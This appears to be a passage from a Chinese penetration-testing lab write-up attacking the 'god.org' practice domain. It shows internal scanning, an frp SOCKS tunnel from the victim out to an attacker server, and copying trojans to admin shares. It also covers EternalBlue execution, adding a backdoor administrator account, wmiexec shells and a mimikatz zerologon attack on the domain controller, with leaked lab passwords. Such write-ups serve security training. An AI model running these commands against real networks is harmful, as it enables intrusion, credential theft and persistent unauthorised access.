二、内网信息搜集
1)logonpasswords读取密码成功
hongrisec@2019
image-20210816234346492
2)系统信息
systeminfo
主机名: STU1 OS 名称: Microsoft Windows 7 专业版 OS 版本: 6.1.7601 Service Pack 1 Build 7601 系统类型: x64-based PC 域: god.org 登录服务器: \\OWA 修补程序: 安装了 4 个修补程序。 [01]: KB2534111 [02]: KB2999226 [03]: KB958488 [04]: KB976902
3)网卡信息
ipconfig /all
可以看出此靶机存在域中
域名:god.org 双网卡: net1:10.0.1.5(模拟公网) net2:192.168.52.143(可以看出这个是内网ip了) DNS:192.168.52.138 这个DNS大概率是域控god.org的ip
image-20210816234602114
image-20210816234631555
4)端口服务信息
扫描到的东西好多啊。发现网段内存活的另外两台机器分别是138和141。三台竟然都有ms17010,没啥遗憾的,之前没有找到143这个漏洞是因为这个机器防火墙开了,外面扫不到
shell C:\Windows\Temp\fscan.exe -h 192.168.52.1/24 scan start (ICMP) Target '192.168.52.138' is alive (ICMP) Target '192.168.52.141' is alive (ICMP) Target '192.168.52.143' is alive icmp alive hosts len is: 3 192.168.52.138:135 open 192.168.52.138:80 open 192.168.52.143:135 open 192.168.52.143:80 open 192.168.52.141:21 open 192.168.52.143:445 open 192.168.52.138:445 open 192.168.52.141:135 open 192.168.52.141:445 open 192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1) NetInfo: [*]192.168.52.143 [->]stu1 [->]169.254.129.186 [->]192.168.52.143 [->]10.0.1.5 NetInfo: [*]192.168.52.138 [->]owa [->]192.168.52.138 192.168.52.141 MS17-010 (Windows Server 2003 3790) NetInfo: [*]192.168.52.141 [->]root-tvi862ubeh [->]192.168.52.141 192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1) WebTitle:http://192.168.52.138:80 200 None 192.168.52.143:3306 open 192.168.52.141:7001 open FTP:192.168.52.141:21:ftp admin123A WebTitle:http://192.168.52.143:80 200 phpStudy 鎺㈤拡 2014 192.168.52.143 MS17-010 (Windows 7 Professional 7601 Service Pack 1) NetInfo: [*]192.168.52.143 [->]stu1 [->]169.254.129.186 [->]192.168.52.143 [->]10.0.1.5 WebTitle:http://192.168.52.138:80 200 None NetInfo: [*]192.168.52.138 [->]owa [->]192.168.52.138 NetInfo: [*]192.168.52.141 [->]root-tvi862ubeh [->]192.168.52.141 192.168.52.141 MS17-010 (Windows Server 2003 3790) 192.168.52.138 MS17-010 (Windows Server 2008 R2 Datacenter 7601 Service Pack 1) FTP:192.168.52.141:21:ftp admin123A
5)域内机器信息
使用CS的插件上传运行nbtscan进行扫描,或者自己上传nbtscan扫描
image-20210818215517732
192.168.52.138 GOD\OWA SHARING DC 192.168.52.141 GOD\ROOT-TVI862UBEH SHARING ? 192.168.52.143 GOD\STU1 SHARING
image-20210818215550571
三、frp打隧道
(1)配置文件
靶机:
# frpc.ini [common] server_addr = 10.0.1.12 server_port = 11608 [http_proxy] type = tcp remote_port = 11668 plugin = socks5
/PS:
# frps.ini[common]bind_addr = 0.0.0.0bind_port = 11608
先在/PS建立服务端
./frps -c frps.ini
image-20210817001401291
然后在靶机开启客户端
shell cd C:\Windows\Temp\ && frpc.exe -c frpc.ini
image-20210817002249004
kali回显
image-20210817002312187
proxychains设置:
10.0.1.12 11668
连接测试
经过测试,ftp连接登录后,无法获取目录
image-20210817004754233
四、攻击192.168.52.138
1)思路描述
(1)思考1
在攻击过程中我发现没有建立IPC的时候windows7系统的web服务器中可以直接dir列出192.168.52.138和192.168.52.141两台机器的目录,这也是靶机域环境的一个漏洞
image-20210818220737043
image-20210818220704119
所以,我们可以对CS会话建立192.168.52.143(切记,不能写10.0.1.5)的中转监听,生成这个监听的木马,把马传到141和138的机器,然后使用永恒之蓝运行exe木马就可以上线
copy 64.exe \\192.168.52.141\c$\windows\system32\ copy 64.exe \\192.168.52.138\c$\windows\system32\
(2)思考2
既然存在永恒之蓝漏洞,可以使用永恒之蓝漏洞新建用户并添加到本地administrators组,这里不能建立域用户。提示:建立用户是很容易被发现的~
image-20210818223431301
net user ch4nge QWEasd123 /add net localgroup Administrators ch4nge /add
难用的方法:使用CS的会话建立IPC
net use \\192.168.52.138\ipc$ "QWEasd123" /user:ch4nge # 这里发现从域普通用户IPC连接域普通用户,需要域管理员的账号才行,所以想用这个方法渗透到这个普通域用户机器需要在域控那里直接IPC连接(域信任),或者就是好用的方法wmiexec net use \\192.168.52.141\ipc$ "QWEasd123" /user:ch4nge #然后copy马过去,永恒之蓝去执行.永恒之蓝执行命令
好用的方法:通过隧道使用wmiexec连接获取shell,windows版本的wmiexec好用
wmiexec.exe ch4nge:QWEasd123@192.168.52.141 put 32.exe
image-20210819004521782
注意192.168.52.141是win2003,是32位系统,木马要生成32位的
image-20210819004556704
(3)思考3
哈希置零攻击CVE-2020-1472
上传mimikatz,CS上检测是否存在CVE-2020-1472漏洞,看图显示Authentication: OK -- vulnerable表示存在,可以用这个方式攻击域控。
注意这里的sccount从nbtscan得到
shell mimikatz "lsadump::zerologon /target:192.168.52.138 /account:OWA$" "exit"
image-20210818222717067
141这个报错没见过,有师傅知道报错是什么原因导致的吗
image-20210818222940630
